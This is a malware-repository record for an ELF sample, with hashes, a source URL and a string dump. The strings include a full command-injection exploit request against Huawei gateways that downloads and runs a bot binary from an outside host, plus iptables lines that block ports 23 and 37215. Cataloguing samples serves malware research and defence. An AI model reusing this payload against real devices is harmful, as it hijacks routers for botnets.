MalShare

Sample details: 4f8030996cf14ecd3587f411d741f50e --

Hashes
MD5: 4f8030996cf14ecd3587f411d741f50e
SHA1: bb9bd1acb35e412025feb3f293381d3158ef8976
SHA256: eec5bf1d7ec9e6db90f803c71fffaefe4ab24a2c9c78d43ce0534ddb48aa4a0f
SSDEEP: 768:SyNZFzadoWl1e6IwRydRp0gRHHsWQcRew4SC0H5wbygOx4krL4T6NyCYLK:tzbWl1e6I4aA4sKRe+n6HhoLc6MCYLK

Details
File Type: ELF

Yara Hits

Source
http://185.62.190.159/bins/ppc.idopoc

Strings
}$KxB }$KxB ?MWZ > :}VI.}6J U) 6\| :}VI.}6J U) 6\| }#Kx9) \| q.9) }KSx}> "\8!"`N "\8!"`N } HPU) \| y.9) 8T`X(}iJx\|c 4\|iJxTc X(}iJx Jx\| JxT }j[x9j dU) 6}) dU) 6}) U @.U)(4}) }ISxB >TkF>/ KxTi@.\| }#Kx9) } HPU) $}+Kx9k >}(Kx/ }#Kx}e[x8 +x}%KxD QJD.QJ }#Kx8! }#XP9) }CSx}e[x }CSx}e[x }e[x}CSx }+HPU) 9)09U) }FSx}i <\| R.p }iXP= <\| :.p \| :.p POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> iptables -A INPUT -p tcp --destination-port 23 -j DROP iptables -A INPUT -p tcp --destination-port 37215 -j DROP +)#0+XB M$65&6SRS= M$65&6SRS>B B+)#0+b SPQVWT ?/bin/sh /dev/null .shstrtab .rodata .ctors .dtors .sdata

Strings

		 }$KxB
 }$KxB
?MWZ >
:}VI.}6J
U) 6|	
:}VI.}6J
U) 6|	
}#Kx9)
|	q.9)
}KSx}>
"\8!"`N
"\8!"`N
} HPU)
|	y.9)
8T`X(}iJx|c
4|iJxTc
X(}iJx
Jx|	JxT
}j[x9j
dU) 6})
dU) 6})
U @.U)(4})
 }ISxB
>TkF>/
KxTi@.|
}#Kx9)
} HPU)
$}+Kx9k
>}(Kx/
}#Kx}e[x8
+x}%KxD
QJD.QJ
}#Kx8!
}#XP9)
 }CSx}e[x
}CSx}e[x
}e[x}CSx
}+HPU)
9)09U)
}FSx}i
<|	R.p	
}iXP= 
<|	:.p	
|	:.p	
 POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
*+)#0+XB
M$65&6SRS=
M$65&6SRS>B
B*+)#0+b
SPQVWT
?/bin/sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors
.sdata